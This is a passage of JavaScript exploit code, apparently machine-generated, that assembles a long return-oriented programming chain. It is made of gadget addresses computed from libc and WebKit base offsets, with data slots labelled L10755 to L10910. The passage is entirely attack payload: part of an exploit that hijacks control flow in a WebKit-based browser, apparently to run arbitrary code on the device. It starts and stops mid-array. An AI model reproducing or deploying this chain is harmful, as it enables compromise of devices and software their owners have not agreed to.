//L10755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+494720, //L10753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10755: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+494880, //L10758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+494848, //L10756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+494864, //L10757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10756: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10757: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10758: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+494968, //L10760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10759: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10760: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+495024, //L10761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10763: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+495104, //L10765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10765: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+495216, //L10766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10766: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10768: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+495336, //L10771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+495320, //L10769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10769: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10771: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+495480, //L10774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+495448, //L10772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+495464, //L10773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10772: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10773: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10774: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+495560, //L10775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10775: db([0, 0]); 
// 0x0 set_gadget(libc_base+764760,); //pop rsi //L10777: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+495680, //L10780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+495664, //L10778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10780: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+495840, //L10784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+495792, //L10781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+495808, //L10782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10781: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10782: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10783: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10784: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+495896, //L10785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10785: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10787: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+496016, //L10788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+496032, //L10790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10788: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L10790: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+496208, //L10793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+496224, //L10794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+496176, //L10791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+496192, //L10792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10791: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10792: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10793: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10794: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+496304, //L10795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+496320, //L10796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10795: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10796: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+496400, //L10797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+496416, //L10798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10797: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10798: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+496576, //L10802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+496544, 
//L10800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+496560, //L10801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10799: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L10800: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10801: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10802: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+496632, //L10804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L10804: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+496760, //L10806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+496776, //L10807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+496744, //L10805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10805: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10806: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10807: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+496856, //L10808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+496872, //L10809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10808: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10809: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+496968, //L10811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+496952, //L10810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10810: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10811: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+497048, //L10812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10812: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10814: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+497168, //L10817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+497152, //L10815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10815: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10817: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+497248, //L10819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+497280, //L10821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10819: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L10820: ropchain+497408, //L10818 libc_base+144605 //pop rdi ]); //L10821: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+497384, //L10823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+497400, //L10822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); 
//L10823: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L10822: db([0, 0]); // 0x0 //L10818: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+497480, //L10824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10826: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+497600, //L10829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+497584, //L10827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10829: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+497776, //L10832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+497792, //L10833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+497744, //L10830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+497760, //L10831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10830: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10831: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10833: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+497888, //L10835 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+497872, //L10834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10834: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10835: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10836: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10837: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L10838: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+498088, //L10840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10840: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+498144, //L10841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10841: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+498280, //L10845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+498264, //L10844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10843: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10844: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L10845: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+498416, //L10848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+498448, //L10850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+498400, //L10847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10847: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10848: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10849: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10850: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+498560, //L10851+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+498552, //L10851 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10851: db([0, 0]); // 0x0 set_gadgets([ ropchain+498576, //L10851+24 ropchain+502600, //L10846 //L10852: libc_base+764760, //pop rsi ropchain+498616, //L10853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10853: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10855: db([4294967220, 4294967295]); // -0x4c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+498736, //L10858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+498720, //L10856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10856: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L10858: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+498912, //L10861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+498928, //L10862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+498880, //L10859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+498896, //L10860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10859: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10860: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10861: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10862: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+499024, //L10864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+499008, //L10863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10863: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10864: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+499112, //L10866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10865: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10866: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+499168, //L10867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10867: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); 
//pop rsi //L10869: db([4294967220, 4294967295]); // -0x4c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+499248, //L10871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10871: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+499384, //L10874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+499368, //L10873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10872: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10873: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10874: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+499488, //L10876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+499472, //L10875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10875: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10876: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+499568, //L10877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10877: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10879: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+499688, //L10882 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+499672, //L10880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10880: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10882: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+499864, //L10885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+499880, //L10886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+499832, //L10883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+499848, //L10884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10883: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10884: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10886: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+500040, //L10890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+500008, //L10888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+500024, //L10889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10887: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10888: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10889: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10890: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+500128, //L10891 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+500144, //L10892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10891: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10892: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+500320, //L10894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+500336, //L10895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+500304, //L10893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10893: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10894: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10895: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+500448, //L10897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+500496, //L10900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+500464, //L10898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10897: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10898: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10899: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10900: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, 
//shl rax, 3 libc_base+764760, //pop rsi ropchain+500608, //L10901+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+500600, //L10901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10901: db([0, 0]); // 0x0 set_gadgets([ ropchain+500624, //L10901+24 ropchain+502568, //L10896 libc_base+764760, //pop rsi ropchain+500664, //L10902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10902: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10904: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+500784, //L10907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+500768, //L10905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10905: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10907: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+500928, //L10910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+500896, //L10908 webkit_base+660161, //mov [rsi], rax 